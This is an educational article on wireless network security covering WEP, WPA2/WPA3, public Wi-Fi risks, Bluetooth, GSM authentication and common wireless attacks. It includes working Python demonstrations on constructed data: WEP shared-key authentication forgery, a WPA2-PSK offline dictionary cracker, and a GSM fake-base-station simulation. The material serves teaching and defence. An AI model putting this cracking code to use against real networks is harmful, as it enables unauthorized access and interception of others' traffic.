Wireless Network Security
Wireless network security is the practice of designing, implementing and maintaining protections for a wireless computer network. It is the subset of network security that deals with the threats that arise when the transmission medium is radio rather than a cable: anyone within range can receive, inject or jam traffic without touching a port.
Wireless network security is also known as wireless security.
Wireless network security primarily protects a wireless network from unauthorized and malicious access attempts. Typically it is delivered by the wireless infrastructure itself (usually the access point or wireless router), which authenticates clients and encrypts all traffic over the air. Because frames are encrypted on the radio link, an attacker who captures them without the key cannot read their contents; if the key itself is compromised, however, everything protected by it is exposed, which is why key management and the choice of protocol matter as much as the cipher. Wireless intrusion detection and prevention systems add a further layer by alerting the administrator to rogue access points, address spoofing and denial-of-service activity.
Some of the common standards for wireless network security are Wired Equivalent Privacy (WEP), now broken and deprecated, and Wi-Fi Protected Access (WPA, WPA2 and WPA3).
To secure the wireless connection, we should focus on the following areas –
Identifying the endpoints of the wireless network and the end-users, i.e., Authentication.
Protecting wireless data packets from interception by a third party, i.e., Privacy (confidentiality).
Keeping the wireless data packets intact and detecting tampering, i.e., Integrity.
We know that wireless clients form an association with Access Points (AP) and transmit data back and forth over the air. As long as all wireless devices follow the 802.11 standards they can coexist, but not all of them are friendly or trustworthy: rogue devices may be a threat to wireless security, stealing important data or causing the unavailability of the network.
Wireless security is ensured by the following methods:
Authentication
Privacy and Integrity
For data transmitted over the air, open authentication provides no security: any client may associate, and nothing is encrypted unless a separate mechanism is layered on top.
WEP encrypts every frame with the RC4 stream cipher. Sender and receiver share a static WEP key (40 or 104 bits); for each frame a 24-bit initialization vector (IV) is prepended to that key to seed RC4, and the resulting keystream is XORed with the payload. Because the IV space holds only about 16 million values and the IV travels in the clear, keystreams are reused, which is the root of WEP's cryptographic weakness.
The WEP key can serve as an authentication credential as well as an encryption key. In shared-key authentication, a client can associate only if it knows the key: the AP sends a random challenge text, the client returns it encrypted under the WEP key with an IV of its choosing, and the AP compares the result with its own encryption of the challenge. If both match, association is granted. The check is self-defeating: anyone listening captures both the plaintext challenge and its ciphertext, XORs them to recover the RC4 keystream for that IV, and can thereafter pass the same check, and decrypt frames sent under that IV, without ever learning the key. Open authentication with WEP encryption was therefore considered the lesser evil; neither is acceptable today.
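The keystream leak described above, as an added example that is not part of the original page: a minimal RC4, WEP-style per-frame keying (IV prepended to the shared key, CRC-32 ICV omitted since it plays no part in the leak), an access point and client performing shared-key authentication, and an eavesdropper who recovers the keystream from the exchange and then authenticates without the key. The key, challenge and IV values are constructed for the example.

```python
"""WEP shared-key authentication leaks RC4 keystream (added example, constructed data)."""
import os


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling, then the PRGA XORed over data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP per-frame key = 24-bit IV || shared key (40 or 104 bits). The IV is sent in clear."""
    assert len(iv) == 3
    return rc4(iv + wep_key, payload)


class AccessPoint:
    def __init__(self, wep_key: bytes):
        self._key = wep_key
        self.last_challenge = b""

    def challenge(self) -> bytes:
        self.last_challenge = os.urandom(128)  # 802.11 shared-key auth uses a 128-byte challenge
        return self.last_challenge

    def verify(self, iv: bytes, response: bytes) -> bool:
        return wep_encrypt(self._key, iv, self.last_challenge) == response


class Client:
    def __init__(self, wep_key: bytes):
        self._key = wep_key

    def answer(self, challenge: bytes):
        iv = os.urandom(3)
        return iv, wep_encrypt(self._key, iv, challenge)


def recover_keystream(challenge: bytes, response: bytes) -> bytes:
    """Eavesdropper's view: plaintext XOR ciphertext is the RC4 keystream for that IV."""
    return bytes(c ^ r for c, r in zip(challenge, response))


def forge_auth(ap: AccessPoint, iv: bytes, keystream: bytes) -> bool:
    """Pass shared-key authentication with no knowledge of the key: reuse IV + keystream."""
    new_challenge = ap.challenge()
    forged = bytes(c ^ k for c, k in zip(new_challenge, keystream))
    return ap.verify(iv, forged)


def demo():
    key = bytes.fromhex("0123456789")  # constructed 40-bit WEP key, unknown to the attacker
    ap, client = AccessPoint(key), Client(key)
    challenge = ap.challenge()
    iv, response = client.answer(challenge)        # legitimate exchange, observed by attacker
    legit_ok = ap.verify(iv, response)
    keystream = recover_keystream(challenge, response)
    # 128 bytes of keystream for this IV: enough to forge authentication and to decrypt
    # the first 128 bytes of any frame the network sends with the same IV.
    forged_ok = forge_auth(ap, iv, keystream)
    keystream_correct = keystream == rc4(iv + key, bytes(128))
    return legit_ok, forged_ok, keystream_correct


if __name__ == "__main__":
    print(demo())
```

The forged response never touches `key`; only the IV and keystream captured from one legitimate authentication are reused, which is exactly why shared-key authentication was withdrawn in favour of open authentication with WEP, and later replaced entirely.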
In WEP authentication, the wireless clients are authenticated locally at the AP. The scenario changes with 802.1X: a dedicated authentication server is added to the infrastructure, and three roles participate:
1. Supplicant – the device requesting access (the client and its 802.1X software).
2. Authenticator – the device that controls access to the network, usually the access point or a WLAN controller (WLC); it relays EAP messages between the two other parties but does not see the credentials.
3. Authentication Server – usually a RADIUS server, which validates the client's credentials and grants or denies access; with WPA2/WPA3-Enterprise it also delivers the per-session master key to the authenticator, so there is no shared passphrase to steal or guess.
WPA2 protocol advancements
WPA2 superseded WPA in 2004. WPA2 uses the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), which is built on the Advanced Encryption Standard (AES) and provides confidentiality, message authenticity and integrity verification in one construction. CCMP is stronger and more reliable than WPA's original Temporal Key Integrity Protocol (TKIP), a stop-gap designed to run on WEP-era RC4 hardware.
WPA2 still has vulnerabilities, however. The most common route to unauthorized access on a WPA2 network is not the cipher but Wi-Fi Protected Setup (WPS): the 8-digit WPS PIN is validated in two halves, so an attacker within radio range can brute-force it in hours and obtain the WPA2 passphrase. WPS should be disabled on every access point that supports it. Other attacks against WPA2 networks do not break the encryption itself but target higher layers once the attacker is on the same network, for example downgrading or stripping a client's Transport Layer Security session; the key reinstallation attacks (KRACK) discussed later target the handshake itself.
Though these threats have traditionally been directed at enterprise wireless systems, home wireless systems with simple or default passwords are exposed as well. Privileged accounts, such as the router's administrator account, should always have long, unique passwords, and any password should be changed as soon as compromise is suspected.
Difference between WPA and WEP
WEP is the security protocol specified in the original 802.11 standard. Its goal, as the name says, was to give a wireless LAN privacy roughly equivalent to that of a wired LAN; it did not achieve it.
The standard 64-bit WEP uses a 40-bit key (plus the 24-bit IV), and 128-bit WEP uses a 104-bit key. WEP also defines two forms of authentication: Open System Authentication (OSA) and Shared Key Authentication (SKA). OSA lets any client authenticate with the access point; a client without the correct WEP key simply cannot exchange readable data afterwards. SKA is a four-frame challenge-response exchange: the AP sends a challenge, the client returns it encrypted with the WEP key, and the AP checks the result. The key itself is never sent, but the exchange reveals keystream to an eavesdropper, which is why SKA is weaker than OSA.
In 2003, the Wi-Fi Alliance announced the supersession of WEP in favor of WPA. Software updates that allowed both access points and client computers to implement WPA became widely available that same year. Access points can operate in a mixed WEP/WPA mode to support both WEP and WPA clients. However, mixed mode effectively provides only WEP-level security for all users, since the weakest client dictates the group key.
WPA brought about a major change in the security of wireless communications, and each later version has raised the bar further.
WPA vs. WPA2 vs. WPA3: When to use them
The different WPA versions have, over time, raised the security baseline for devices with wireless connections. One way to compare the three is to see how WPA and WPA3 stack up against WPA2.
WPA3 vs. WPA2
WPA3 is more secure and comprehensive than WPA2; however, the Wi-Fi Alliance still supports and updates the WPA2 program. WPA3's notable features over WPA2 include Simultaneous Authentication of Equals (SAE) in place of the pre-shared-key handshake, forward secrecy for session keys, mandatory Protected Management Frames, individualized data encryption on open networks (Wi-Fi Enhanced Open, based on OWE, announced alongside WPA3), and an optional 192-bit security suite for enterprise use.
WPA3-Enterprise's 192-bit mode uses GCMP-256 with 256-bit keys, stronger than WPA2's AES-CCMP with 128-bit keys; WPA3-Personal keeps CCMP-128 but changes how the key is established. The practical difference for home and small-office networks is SAE: in WPA2-PSK an attacker who records one four-way handshake can test passphrase guesses offline at will, whereas SAE requires a live exchange with the access point for every single guess, so dictionary attacks become online, rate-limitable and slow. WPA2, by comparison, lacks this property, making brute-force attacks against weak passphrases a far bigger threat.
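The offline attack that SAE removes, as an added example (not code from the original page): the WPA2-PSK key hierarchy reconstructed from the 802.11i definitions (PMK = PBKDF2-HMAC-SHA1 over passphrase and SSID, PTK via PRF-512, and the HMAC-SHA1 Key MIC of EAPOL-Key message 2), then a dictionary attack that tests candidate passphrases against a "captured" handshake. The handshake is constructed inside the block from a secret passphrase; the MAC addresses, nonces and EAPOL bytes are placeholders, not parsed from a real capture. The same hierarchy is why 802.1X/EAP networks are not affected: there the PMK is delivered per session by the authentication server instead of being derived from a guessable passphrase.

```python
"""WPA2-PSK offline dictionary attack against a four-way handshake (added example)."""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    Deterministic and computable offline: this is the root of the weakness."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(N)||max(N))."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP Key MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), first 16 bytes."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


def make_handshake(passphrase, ssid, ap_mac, client_mac, anonce, snonce, eapol_body):
    """What a sniffer would collect from messages 1 and 2; built here from the real passphrase."""
    pmk = derive_pmk(passphrase, ssid)
    kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]  # KCK = first 128 bits of PTK
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol_body, "mic": eapol_mic(kck, eapol_body)}


def crack(hs: dict, wordlist):
    """Offline: every guess costs one PBKDF2 plus a few HMACs, and never touches the network."""
    for candidate in wordlist:
        pmk = derive_pmk(candidate, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate
    return None


# Constructed sample data (placeholders, not a real capture)
SSID = "CoffeeShop"
AP_MAC = bytes.fromhex("00112233aabb")
CLIENT_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(112)  # stand-in EAPOL-Key, MIC zeroed
HANDSHAKE = make_handshake("latte2019", SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, EAPOL_MSG2)
WORDLIST = ["password", "coffee123", "latte2019", "espresso"]

if __name__ == "__main__":
    print("recovered passphrase:", crack(HANDSHAKE, WORDLIST))
```

Real tools parse the nonces, addresses and MIC out of a packet capture and run the same loop on GPUs; the defence on WPA2 is a long random passphrase (PBKDF2 at 4096 iterations is cheap per guess), and on WPA3 the move to SAE, which gives an eavesdropper nothing to test guesses against.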
Whether it is a home or business network, the risks to an unsecured wireless network are the same. Some of the risks include:
Piggybacking is the simplest risk: if you fail to secure your wireless network, anyone with a wireless-enabled computer in range of your access point can use your connection. The typical indoor broadcast range of an access point is 150–300 feet. Outdoors, this range may extend as far as 1,000 feet. So, if your neighborhood is closely settled, or if you live in an apartment or condominium, failure to secure your wireless network could open your internet connection to many unintended users. These users may be able to conduct illegal activity that is traced to your connection, monitor and capture your web traffic, or steal personal files.
Wardriving is a specific kind of piggybacking. The broadcast range of a wireless access point can make internet connections available outside your home, even as far away as your street. Savvy computer users know this, and some have made a hobby out of driving through cities and neighborhoods with a wireless-equipped computer—sometimes with a powerful antenna—searching for unsecured wireless networks. This practice is known as “wardriving.”
In an evil twin attack, an adversary gathers information about a public network access point, then sets up their own system to impersonate it. The adversary uses a broadcast signal stronger than the one generated by the legitimate access point, so unsuspecting users connect to the stronger signal. Because the victim is reaching the internet through the attacker's system, the attacker can use ordinary tools to read any unencrypted data the victim sends, such as credit card numbers, username and password combinations, and other personal information. Confirm the name and password of a public Wi-Fi hotspot with the venue before use; note that a name alone proves nothing, since the attacker copies it, so treat any public network as hostile and rely on TLS (HTTPS) or a VPN for anything sensitive.
Many public access points are not secured and the traffic they carry is not encrypted over the air. This can put your sensitive communications or transactions at risk. Because your connection is transmitted "in the clear", malicious actors could use sniffing tools to obtain sensitive information such as passwords or credit card numbers from any application that does not encrypt its own traffic. Ensure that the access points you connect to use at least WPA2 (preferably WPA3) encryption, and on open networks use a VPN.
An unsecured public wireless network combined with unsecured file sharing could allow a malicious user to access any directories and files you have unintentionally made available for sharing. Ensure that when you connect your devices to public networks, you deny sharing files and folders. Only allow sharing on recognized home networks and only while it is necessary to share items. When not needed, ensure that file sharing is disabled. This will help prevent an unknown attacker from accessing your device’s files.
In public areas malicious actors can simply glance over your shoulder as you type. By simply watching you, they can steal sensitive or personal information. Screen protectors that prevent shoulder-surfers from seeing your device screen can be purchased for little money. For smaller devices, such as phones, be cognizant of your surroundings while viewing sensitive information or entering passwords.
Not all attackers rely on gaining access to your data via wireless means. By physically stealing your device, attackers could have unrestricted access to all of its data, as well as any connected cloud accounts. Taking measures to protect your devices from loss or theft is important, but should the worst happen, a little preparation may protect the data inside. Most mobile devices, including laptop computers, now have the ability to fully encrypt their stored data—making devices useless to attackers who cannot provide the proper password or personal identification number (PIN). In addition to encrypting device content, it is also advisable to configure your device’s applications to request login information before allowing access to any cloud-based information. Last, individually encrypt or password-protect files that contain personal or sensitive information. This will afford yet another layer of protection in the event an attacker is able to gain access to your device.
If you need to access any websites that store or require the input of any sensitive information — including social networking, online shopping and online banking sites — it may be worthwhile accessing them via your mobile phone network, instead of the public Wi-Fi connection.
Make sure all of your devices are protected by a rigorous anti-malware and security solution — and ensure that it’s updated as regularly as possible.
The Wireless Industry
Wireless on its own is typically used to refer to products and services from the cellular telecommunications industry. CTIA, the Wireless Association, for example, is comprised of wireless carriers, such as Verizon, AT&T, T-Mobile, and Sprint, and cellphone manufacturers like LG and Samsung. Different wireless protocols and phone standards include CDMA, GSM, EV-DO, 3G, 4G, and 5G.
Examples of Wireless Devices
Cordless phones are wireless devices, as are TV remote controls, radios, and GPS systems. Other wireless devices include phones, tablets, Bluetooth mice and keyboards, wireless routers, and most devices that don't use wires to transmit information.
Wireless chargers are another type of wireless device. Although no data is sent through a wireless charger, it does interact with another device (like a phone) without using wires.
What is wireless mobile phone security?
Mobile Device Security refers to the measures designed to protect sensitive information stored on and transmitted by laptops, smartphones, tablets, wearables, and other portable devices. At the root of mobile device security is the goal of keeping unauthorized users from accessing the enterprise network.
Why is mobile security important?
The future of computers and communication lies with mobile devices, such as laptops, tablets and smartphones with desktop-computer capabilities. Their size, operating systems, applications and processing power make them ideal to use from any place with an internet connection. And with the expansion of ruggedized devices, the Internet of Things (IoT) and operating systems, such as Chrome OS, macOS and Windows 10, every piece of hardware that's enhanced with this software and capabilities becomes a mobile computing device.
Because mobile devices have become more affordable and portable, organizations and users have preferred to buy and use them over desktop computers. And with ubiquitous wireless internet access, all varieties of mobile devices are becoming more vulnerable to attacks and data breaches.
Authentication and authorization across mobile devices offer convenience, but increase risk by removing a secured enterprise perimeter’s constraints. For example, a smartphone’s capabilities are enhanced by multi-touch screens, gyroscopes, accelerometers, GPS, microphones, multi-megapixel cameras and ports, allowing the attachment of more devices. These new capabilities change the way users are authenticated and how authorization is provided locally to the device and the applications and services on a network. As a result, the new capabilities are also increasing the number of endpoints that need protection from cybersecurity threats.
Today cybercriminals can hack into cars, security cameras, baby monitors and implanted healthcare devices. And by 2025, there could be more than 75 billion “things” connected to the internet — including cameras, thermostats, door locks, smart TVs, health monitors, lighting fixtures and many other devices.
Basic wireless router security
Every router should have a strong administrator password to keep attackers out. Routers ship with default passwords, often printed on the device or identical across a model, and these should be changed during setup. Creating a new, complex, unique password for your wireless router is easy and should only take a couple of minutes. Specific instructions vary from one router to another, but the basic idea is this:
Wi-Fi GPS works to track your location
Wi-Fi Positioning System (WPS, not to be confused with Wi-Fi Protected Setup) is a geolocation system that uses nearby Wi-Fi access points to locate devices. It usually works alongside GPS to improve accuracy and speed up the first fix. Companies like Google, Apple, and Microsoft use GPS-equipped devices to map where Wi-Fi networks are, and that map is then used to locate a device from the networks it can hear.
Wi-Fi positioning is useful in urban environments, where there are many wireless networks broadcasting within the same area. It is also useful in places that are out of reach to GPS, such as tunnels, large buildings, and underground structures.
However, WPS only works within range of Wi-Fi signals that are already in the database; if there aren't any known networks around, it cannot produce a fix.
How Wi-Fi Location Services Work
Devices that have both GPS and Wi-Fi send information about nearby networks back to the location service: the BSSID (the access point's MAC address), typically together with the SSID and signal strength, along with the location determined by GPS.
While GPS determines the device's own location, the device also scans nearby networks for the publicly broadcast information that identifies them. The location and the list of nearby networks are then recorded in the vendor's database.
Let's say, for example, you have full GPS access and your Wi-Fi is turned on in a grocery store. The location of the store is easily spotted because your GPS is working, so your location and some information about any nearby Wi-Fi networks are sent to the vendor (such as Google or Apple).
Later, someone else enters the grocery store with Wi-Fi on but, because of bad weather or thick walls, has no GPS signal. Their location can still be determined from the Wi-Fi networks around them. Vendors like Microsoft, Apple, and Google refresh this data continuously to improve their location services. Network owners contribute involuntarily: only beacon information is needed, so vendors never need a Wi-Fi password to map a network.
What Is Bluetooth Wireless Networking?
Bluetooth is a radio communication technology that enables low-power, short distance wireless networking between phones, computers, and other network devices.
The name Bluetooth is borrowed from King Harald Gormsson of Denmark who lived more than 1,000 years ago. The king's nickname meant "Bluetooth," supposedly because he had a dead tooth that looked blue. The Bluetooth logo is a combination of the two Scandinavian runes for the King's initials.
Bluetooth Security
As with other wireless protocols, Bluetooth has received its fair share of scrutiny over the years for security weaknesses. Popular television dramas sometimes feature criminals pairing with an unsuspecting victim's phone and then eavesdropping on conversations and stealing private data. In real life these attacks rarely work the way they are portrayed: pairing normally requires the victim's participation, and the realistic risks are weaknesses in particular pairing modes or in device firmware rather than a one-click takeover.
While Bluetooth incorporates its own security protections, experts recommend turning Bluetooth off when it is not in use, keeping devices non-discoverable, and refusing unexpected pairing requests, to remove the small risk that remains.
Hackers Can Spy on Wireless Keyboards From Hundreds of Feet Away
Wireless keyboards generally protect their users by encrypting the data that they send back to the computers they’re paired with. That way, even if hackers try to listen in on the data stream, they’ll get nothing but an undecipherable mess. Sometimes, however, the encryption isn’t well executed:
An example:
Last year, a prolific security researcher found a weakness in the encryption used by certain Microsoft keyboards, and built a small device to intercept and decode what’s being typed on them.
That’s the sort of vulnerability that Marc Newlin, a researcher at Bastille, was looking for when he set out to hack 12 popular models of wireless keyboards from brands like Hewlett-Packard, Toshiba, Radio Shack, and General Electric. What he found, though, was even more shocking than a poorly secured data connection: Some keyboards weren’t encrypting the keystrokes being tapped out on them at all.
Newlin started out by reverse-engineering the transceivers—the little USB dongles that come with wireless keyboards—to try and determine how they communicate. “I thought this was going to be just the first part of the process,” Newlin said. “It turned out after completing that step that, lo and behold, all of the keystroke data was simply being transmitted in cleartext, with no encryption whatsoever.”
Introduction to GSM security
The Global System for Mobile Communications (GSM) is a digital cellular standard deployed worldwide for mobile telephony. It operates in the microwave bands and shares each carrier among several users in time, a scheme known as Time Division Multiple Access (TDMA). This section describes how traffic on a GSM network can be observed and how an attacker could abuse the network.
Mobile communication technology was already developed and widely used in the early 1980s: the C-NET (C-Netz) system in Germany and Portugal by Siemens, the RC-2000 (Radiocom 2000) system in France, the NMT system in the Netherlands and Scandinavia by Ericsson, and the TACS system in the UK. GSM appeared in mid-1991 and eventually became the mobile telecommunications standard for the whole of Europe, maintained by an ETSI (European Telecommunications Standards Institute) technical committee.
At its introduction GSM was the first widely deployed cellular system with standardized security mechanisms: the subscriber is authenticated with a secret key held in the SIM, calls are encrypted on the radio link, and the subscriber's permanent identity is hidden behind temporary identifiers. That protection is confined to the air interface between handset and base station, not end to end, and the original ciphers (A5/1 and A5/2) have since been broken; later generations (UMTS, LTE, 5G) added mutual authentication and stronger ciphers.
Temporary identification numbers are assigned to the subscriber to maintain privacy. The privacy of the communication is maintained by encryption on the radio link and by frequency hopping, both made possible by the digital signalling.
Problem
The weakness lies in the GSM design itself. The A5/1 cipher was kept secret; after its design leaked in 1994 and was fully reverse engineered in 1999, practical attacks followed, including sniffing and decrypting voice in an established call. The network also never authenticates itself to the phone, so a fake base station can attract handsets and instruct them to disable encryption.
Sniffing GSM In Realtime
In order to sniff GSM traffic you need hardware that works as a receiver, for example an RTL-SDR dongle built around the RTL2832U chip. This hardware has limitations: it samples roughly 2.4 MHz of spectrum at a time (a GSM carrier is 200 kHz wide, so only a handful of adjacent channels are visible at once), and it cannot follow a call whose channel uses frequency hopping across the band. In other words, not all GSM traffic can be captured with this hardware; typically only the broadcast and control channels of one cell are observed.
Mobile Station Authentication
The GSM network authenticates the identity of the subscriber through the use of a challenge-response mechanism. A 128-bit Random Number (RAND) is sent to the MS. The MS computes the 32-bit Signed Response (SRES) based on the encryption of the RAND with the authentication algorithm (A3) using the individual subscriber authentication key (Ki). Upon receiving the SRES from the subscriber, the GSM network repeats the calculation to verify the identity of the subscriber.
The individual subscriber authentication key (Ki) is never transmitted over the radio channel; it is stored only in the subscriber's SIM and in the Authentication Centre (AuC). The HLR and VLR receive and cache authentication triplets (RAND, SRES, Kc) derived from it, not Ki itself. If the received SRES agrees with the calculated value, the MS has been successfully authenticated and may continue. If the values do not match, the connection is terminated and an authentication failure is indicated to the MS.
The calculation of the signed response is processed within the SIM. It provides enhanced security, as confidential subscriber information such as the IMSI or the individual subscriber authentication key (Ki) is never released from the SIM during the authentication process.
Signalling and Data Confidentiality
The SIM contains the ciphering key generating algorithm (A8) that is used to produce the 64-bit ciphering key (Kc). This key is computed by applying the same random number (RAND) used in the authentication process to ciphering key generating algorithm (A8) with the individual subscriber authentication key (Ki).
GSM provides an additional level of security by having a way to change the ciphering key, making the system more resistant to eavesdropping. The ciphering key may be changed at regular intervals as required. As in case of the authentication process, the computation of the ciphering key (Kc) takes place internally within the SIM. Therefore, sensitive information such as the individual subscriber authentication key (Ki) is never revealed by the SIM.
Encrypted voice and data communication between the MS and the network uses the A5 ciphering algorithm. Encryption is initiated by a Ciphering Mode Command from the GSM network, which also selects the variant (A5/1, A5/2, A5/3, or A5/0 meaning no encryption). Upon receipt of this command, the mobile station begins encrypting and decrypting with the selected A5 algorithm and the ciphering key (Kc). Because the command itself is not authenticated, a rogue base station can select A5/0 and receive everything in the clear.
Subscriber Identity Confidentiality
To ensure subscriber identity confidentiality, a Temporary Mobile Subscriber Identity (TMSI) is used in place of the permanent IMSI. Once the authentication and ciphering procedures are done, the network sends a TMSI to the mobile station over the now-encrypted channel and the mobile station acknowledges it. The TMSI is valid in the location area in which it was issued; outside that area the Location Area Identification (LAI) is needed in addition to the TMSI. The protection is imperfect: the IMSI must still be sent in the clear the first time a phone attaches, or whenever the network claims not to recognise the TMSI, which is what an IMSI catcher exploits.
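The authentication, Kc derivation and TMSI steps above, simulated end to end as an added example (not code from the original page). The operator's secret A3/A8 is replaced by an HMAC-SHA256 stand-in with the same interface, which is an assumption: the real algorithms differ, but the shape (Ki and a 128-bit RAND in; 32-bit SRES and 64-bit Kc out) is what GSM specifies. The block also shows the one-way nature of the design: a rogue base station with no Ki still gets a valid SRES from the handset and can order it to stop ciphering, because the handset never verifies the network. The IMSI, Ki and message values are constructed.

```python
"""GSM challenge-response authentication and its one-way weakness, simulated (added example)."""
import hashlib
import hmac
import os


def a3_a8(ki: bytes, rand: bytes):
    """Stand-in for the operator's secret A3/A8 (e.g. COMP128); NOT the real algorithm.
    Interface per GSM: (Ki, 128-bit RAND) -> 32-bit SRES (A3) and 64-bit Kc (A8)."""
    digest = hmac.new(ki, rand, hashlib.sha256).digest()
    return digest[:4], digest[4:12]


class SIM:
    """Holds Ki and runs A3/A8 internally; Ki never leaves this object."""

    def __init__(self, imsi: str, ki: bytes):
        self.imsi = imsi
        self.__ki = ki          # private by convention; the handset only sees SRES and Kc
        self.tmsi = None
        self.cipher = None

    def run_gsm_algorithm(self, rand: bytes):
        """Like the RUN GSM ALGORITHM command the handset sends to the SIM."""
        return a3_a8(self.__ki, rand)


class AuC:
    """Authentication Centre: the only network element that stores Ki."""

    def __init__(self):
        self._ki = {}

    def provision(self, imsi: str, ki: bytes):
        self._ki[imsi] = ki

    def triplet(self, imsi: str):
        rand = os.urandom(16)
        sres, kc = a3_a8(self._ki[imsi], rand)
        return rand, sres, kc   # (RAND, SRES, Kc): what the HLR/VLR cache instead of Ki


class MSC:
    """Serving network: authenticates the MS with a triplet, starts ciphering, issues a TMSI."""

    def __init__(self, auc: AuC):
        self.auc = auc
        self.sessions = {}

    def attach(self, ms: SIM) -> bool:
        rand, expected_sres, kc = self.auc.triplet(ms.imsi)
        sres, _ = ms.run_gsm_algorithm(rand)         # Authentication Request -> Response
        if not hmac.compare_digest(sres, expected_sres):
            return False                              # authentication reject
        ms.cipher = "A5/1"                            # Ciphering Mode Command
        ms.tmsi = os.urandom(4)                       # TMSI Reallocation, sent under Kc
        self.sessions[ms.tmsi] = kc
        return True


class FakeBTS:
    """Rogue base station without any Ki. GSM never makes the network prove itself, so
    the handset answers the bogus challenge and obeys an order to use A5/0 (no ciphering)."""

    def attract(self, ms: SIM) -> bool:
        rand = os.urandom(16)
        sres, _ = ms.run_gsm_algorithm(rand)          # handset cannot tell this RAND is bogus
        ms.cipher = "A5/0"
        return len(sres) == 4 and ms.cipher == "A5/0"


def demo():
    ki = os.urandom(16)                               # constructed 128-bit Ki
    imsi = "262011234567890"                          # constructed IMSI
    auc = AuC()
    auc.provision(imsi, ki)
    msc = MSC(auc)
    genuine = SIM(imsi, ki)
    clone_wrong_ki = SIM(imsi, os.urandom(16))        # attacker who knows IMSI but not Ki
    return msc.attach(genuine), msc.attach(clone_wrong_ki), FakeBTS().attract(genuine)


if __name__ == "__main__":
    print("genuine, clone, fake-BTS:", demo())
```

Note where the secret lives: `SIM` and `AuC` hold Ki, while `MSC` only ever sees the triplet, matching the paragraph above. UMTS closed the `FakeBTS` hole by adding an authentication token (AUTN) with which the network proves knowledge of the key to the handset.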
Wireless Network Attacks
Accidental association
Unauthorized access to company wireless and wired networks can come from a number of different methods and intents. One of these methods is referred to as "accidental association". When a user turns on a computer and it latches on to a wireless access point from a neighboring company's overlapping network, the user may not even know that this has occurred. Yet it is a security breach: proprietary company information is exposed, and a link may now exist from one company's network to the other, especially if the laptop is also attached to the wired network and so bridges the two.
Malicious association
"Malicious associations" occur when an attacker actively lures wireless devices into connecting to a company network through his or her own laptop rather than a company access point (AP). Such laptops are known as "soft APs" and are created by running software that makes a wireless network card look like a legitimate access point. Once the cracker controls the client's association, he or she can steal passwords, launch attacks on the wired network, or plant trojans. Because the association happens at Layer 2, Layer 3 controls such as network authentication and virtual private networks (VPNs) do not prevent it; a VPN still protects the confidentiality of the traffic inside its tunnel, but everything outside the tunnel, and the client itself, is exposed. 802.1X authentication helps, but a supplicant that does not validate the authentication server's certificate can still be tricked into handing its credentials to a rogue AP. The goal of this attack is usually not to break the VPN or other security measures; most likely the cracker simply wants to take over the client at Layer 2.
Ad-hoc networks
Ad-hoc networks can pose a security threat. They are peer-to-peer networks between wireless computers with no access point in between. These networks usually have little protection; where they are genuinely needed the same encryption methods should be enforced, and otherwise clients should be configured not to join ad-hoc networks at all.
Non-traditional networks
Non-traditional networks such as personal network Bluetooth devices are not safe from cracking and should be regarded as a security risk. Even barcode readers, handheld PDAs, and wireless printers and copiers should be secured. These non-traditional networks can be easily overlooked by IT personnel who have narrowly focused on laptops and access points.
Identity theft (MAC spoofing)
Identity theft (or MAC spoofing) occurs when a cracker is able to listen in on network traffic and identify the MAC address of a computer with network privileges. Most wireless systems allow some kind of MAC filtering so that only authorized computers with specific MAC addresses can gain access and use the network. However, MAC addresses are sent unencrypted in every frame, many programs can "sniff" them, and the operating system lets a computer present any MAC address the cracker desires, so the hurdle is trivially bypassed. MAC filtering is therefore an administrative convenience, not an access control; real authentication must come from 802.1X or a strong passphrase.
Man-in-the-middle attacks
A man-in-the-middle attacker entices computers to connect to a computer set up as a soft AP (Access Point). The attacker then connects to a real access point through a second wireless card, relaying a steady flow of traffic through the transparent attacking machine to the real network, where it can be sniffed or modified. One variant relies on the lack of authentication on 802.11 management frames to execute a "de-authentication attack": the attacker forges deauthentication frames that force AP-connected computers to drop their connections, after which they reconnect to the cracker's soft AP. Man-in-the-middle attacks are enhanced by software such as LANjack and AirJack, which automate multiple steps of the process; what once required some skill can now be done by script kiddies. Hotspots are particularly vulnerable to any such attack since there is little to no security on these networks. (Source: International Journal of Multimedia and Ubiquitous Engineering, Vol. 3, No. 3, July 2008, p. 80.)
Denial of service
